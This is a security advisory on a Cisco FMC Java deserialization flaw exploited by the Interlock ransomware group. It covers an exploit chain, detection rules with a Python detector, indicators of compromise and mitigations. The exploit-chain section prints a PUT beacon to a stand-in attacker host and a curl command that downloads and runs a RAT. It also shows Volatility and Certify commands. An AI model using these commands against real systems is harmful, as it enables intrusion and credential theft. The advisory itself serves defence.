Cisco FMC Insecure Deserialization — Interlock Ransomware Zero-Day
Severity Assessment
- Exploitability: 9.5/10 — Unauthenticated Java deserialization RCE with no credentials required; weaponized by Interlock as a zero-day for 36 days
- Impact: 10/10 — Root-level code execution on Cisco FMC appliances; full network visibility and control plane compromise
- Weaponization Risk: 9.5/10 — Actively exploited by Interlock ransomware group; CVSS 10.0 CRITICAL; CISA KEV listed
- Patch Urgency: 9/10 — CISA mandatory remediation deadline; enterprise firewall management plane exposure requires immediate action
- Detection Coverage: 6/10 — Java deserialization patterns detectable via network inspection; memory-resident web shells and ScreenConnect deployments require endpoint-level monitoring
Summary
CVE-2026-20131 is a CVSS 10.0 insecure deserialization vulnerability in the web management interface of Cisco Secure Firewall Management Center (FMC). An unauthenticated remote attacker can send crafted serialized Java objects to the interface and execute arbitrary Java code as root on the FMC appliance.
The Interlock ransomware group exploited this as a zero-day starting January 26, 2026 — 36 days before public disclosure on March 4, 2026. Amazon’s threat intelligence team discovered the campaign through their MadPot honeypot infrastructure.
Attackers deployed custom remote access trojans (RATs), web shells, ConnectWise ScreenConnect for persistence, and Certify for Active Directory Certificate Services (AD CS) exploitation. This represents one of the most severe enterprise infrastructure vulnerabilities discovered in Q1 2026.
Exploit Chain
Initial Access — Authentication Bypass via Java Deserialization
An unauthenticated remote attacker sends crafted HTTP requests to the FMC web management path containing malicious serialized Java objects. These requests bypass authentication mechanisms and reach the vulnerable deserialization handler.
POST /admin/pageflows/… HTTP/1.1
Host: fmc.target.com
Content-Type: application/octet-stream
[Serialized Java Object - ysoserial gadget chain]
Code Execution — Java Object Deserialization RCE
The FMC application deserializes the malicious Java object without proper validation. This triggers arbitrary code execution through a Java gadget chain (likely leveraging commons-collections or similar vulnerable libraries). Code executes with root privileges within the FMC process context.
java.io.ObjectInputStream.readObject() → CommonsCollections gadget chain → Runtime.exec() invoked as root → Arbitrary code execution achieved
Confirmation Beacon — Outbound Callback to C2
Compromised FMC systems issue HTTP PUT requests to attacker-controlled servers to confirm successful exploitation. These requests include system identifiers and allow the attacker to verify compromise and prepare for payload delivery.
PUT /check?id=[SYSTEM_ID] HTTP/1.1
Host: attacker-c2.com:8080
Confirmation of successful RCE
Payload Delivery — Malware Download and Execution
Commands are sent to download ELF binaries hosting Interlock’s toolkit, including custom RATs, web shells for persistent access, and reconnaissance scripts. Downloaded payloads execute with root privileges on the FMC appliance.
curl http://attacker-payload.com/interlock_rat.elf
chmod +x interlock_rat.elf
./interlock_rat.elf &
Lateral Movement and Persistence — AD CS Exploitation
ConnectWise ScreenConnect is deployed on the FMC appliance for persistent remote access. The Volatility Framework is used for memory forensics and credential extraction. The Certify tool is executed to discover and exploit misconfigured Active Directory Certificate Services, enabling lateral movement into the domain.
./ScreenConnect.Agent.exe
./volatility.py -f /dev/mem -p [plugin]
./Certify.exe find
Detection Guidance
| Detection Rule | Behavioral Indicator | Confidence |
|---|---|---|
| Java Deserialization Patterns in FMC | Monitor for unusual Java deserialization patterns in FMC web management logs. Look for serialized object streams in HTTP requests to management endpoints. | HIGH |
| Malicious Serialized Objects | Unexpected serialized Java objects in HTTP requests to the FMC management interface. Common gadget chain signatures from ysoserial. | HIGH |
| Outbound C2 Communication | HTTP PUT requests from FMC to external IPs on non-standard ports (8080, 8888, etc.). Outbound callbacks from firewall management to unknown infrastructure. | HIGH |
| Unexpected ELF Binary Downloads | Unexpected ELF binary downloads and execution on FMC appliances. Non-standard process execution chains on FMC running as root. | HIGH |
| ScreenConnect Installation | Unauthorized ConnectWise ScreenConnect installations on FMC systems. ScreenConnect agent processes running on firewall management systems. | MED |
| Memory-Resident Web Shells | Memory-resident web shells processing encrypted payloads. Encrypted command channels from management interfaces. | MED |
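As an added example (not part of this advisory and not Cisco's or Amazon's tooling), the HIGH-confidence rows of the table above expressed as detection logic over constructed HTTP transaction records. The `/admin/` path prefix and the 8080/8888 callback ports are taken from the text; the hosts, ids and the lower-confidence octet-stream rule are assumptions, and the stream-header check relies on the standard java.io serialization magic rather than any gadget signature.

```python
from dataclasses import dataclass

# java.io.ObjectOutputStream starts every stream with 0xACED 0x0005; base64-encoded it begins "rO0AB".
JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
JAVA_STREAM_MAGIC_B64 = b"rO0AB"
MGMT_PATH_PREFIX = "/admin/"    # FMC web-management path family named in the exploit chain
CALLBACK_PORTS = {8080, 8888}   # non-standard outbound ports named in the detection table

@dataclass
class HttpEvent:
    direction: str      # "inbound" (client -> FMC) or "outbound" (FMC -> remote host)
    method: str
    path: str
    peer: str           # remote host as the sensor saw it
    dst_port: int
    content_type: str = ""
    body: bytes = b""

def looks_like_java_stream(body: bytes) -> bool:
    """True if the body carries a raw or base64-encoded Java serialization stream."""
    return body.startswith(JAVA_STREAM_MAGIC) or JAVA_STREAM_MAGIC_B64 in body

def detect(events):
    """Return (rule, confidence, detail) tuples for events matching the table's rules."""
    alerts = []
    for ev in events:
        if ev.direction == "inbound" and ev.path.startswith(MGMT_PATH_PREFIX):
            if looks_like_java_stream(ev.body):
                alerts.append(("serialized-java-object-to-fmc", "HIGH", f"{ev.method} {ev.path}"))
            elif ev.content_type == "application/octet-stream":
                # Binary body to a management page without the stream header: assumed lower confidence.
                alerts.append(("octet-stream-to-fmc-mgmt", "MED", f"{ev.method} {ev.path}"))
        if ev.direction == "outbound" and ev.method == "PUT" and ev.dst_port in CALLBACK_PORTS:
            alerts.append(("outbound-put-callback", "HIGH", f"{ev.peer}:{ev.dst_port}{ev.path}"))
    return alerts

# Constructed sample traffic: hypothetical hosts and ids, not indicators from the advisory.
SAMPLE_EVENTS = [
    HttpEvent("inbound", "GET", "/login.cgi", "10.0.0.5", 443),
    HttpEvent("inbound", "POST", "/admin/pageflows/<placeholder>", "198.51.100.7", 443,
              "application/octet-stream", JAVA_STREAM_MAGIC + b"sr"),   # TC_OBJECT, TC_CLASSDESC
    HttpEvent("inbound", "POST", "/admin/upload", "10.0.0.9", 443,
              "application/octet-stream", b"\x89PNG\r\n\x1a\n"),
    HttpEvent("outbound", "PUT", "/check?id=<placeholder>", "203.0.113.20", 8080),
]

def run_sample():
    # Expected on the sample above: three alerts, in order HIGH, MED, HIGH.
    return detect(SAMPLE_EVENTS)
```

The base64 check matters because management frontends commonly carry serialized objects inside form fields or headers rather than as a raw request body.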
Indicators of Compromise
- Interlock ransomware toolkit components — custom ELF RATs and reconnaissance scripts on FMC appliances
- ConnectWise ScreenConnect unauthorized deployment — ScreenConnect agent processes running on firewall management systems
- HAProxy/fail2ban infrastructure configuration scripts — attacker-side infrastructure tooling recovered from C2 servers
- Volatility Framework deployment on FMC — memory forensics tooling used for credential extraction post-compromise
Recommended Mitigations
- Patch Immediately — Apply Cisco’s security update for FMC. Highest priority given CVSS 10.0 severity.
- Network Segmentation — Ensure FMC management interfaces are not exposed to untrusted networks. Restrict access via ACLs and zero-trust controls.
- ScreenConnect Audit — Review all ConnectWise ScreenConnect deployments for unauthorized installations. Cross-reference with approved software inventory.
- Memory Forensics — Run memory analysis on FMC appliances to detect memory-resident web shells and credential extraction artifacts.
- AD CS Hardening — Audit Active Directory Certificate Services for misconfigurations exploitable via Certify. Implement least-privilege CA permissions and monitor certificate issuance.
Disclosure Timeline
- 2026-01-26: Interlock Zero-Day Exploitation Begins. The Interlock ransomware group begins exploiting CVE-2026-20131 as a zero-day vulnerability. Crafted HTTP requests targeting unauthenticated FMC management interfaces trigger Java deserialization RCE.
- 2026-03-04: Cisco Public Disclosure and Patch Release. Cisco PSIRT publicly discloses CVE-2026-20131 with a CVSS 10.0 rating and releases a security patch. This occurs 36 days after Interlock began zero-day exploitation.
- 2026-03-17: Amazon Threat Intelligence Analysis Published. The Amazon AWS Security Blog publishes a detailed analysis of the Interlock ransomware campaign, including exploitation techniques, TTPs, and indicators of compromise discovered through the MadPot honeypot.
- 2026-03-18: Mass Exploitation Confirmed. Multiple security vendors confirm widespread exploitation of CVE-2026-20131. Kaspersky, CrowdStrike, and other threat intelligence providers report active scanning and exploitation campaigns in the wild.
Sources & References
- CISA: Known Exploited Vulnerabilities Catalog — CISA, 2026-03-04
- National Vulnerability Database: CVE-2026-20131 — National Vulnerability Database, 2026-03-04
- Cisco PSIRT: Security Advisory cisco-sa-fmc-rce-deserialization-20131 — Cisco PSIRT, 2026-03-04
- Amazon Web Services Security Blog: Interlock Ransomware Campaign Analysis via MadPot — Amazon Web Services Security Blog, 2026-03-17
- BleepingComputer: Ransomware Gang Exploits Cisco FMC Zero-Day Since January 2026 — BleepingComputer, 2026-03-04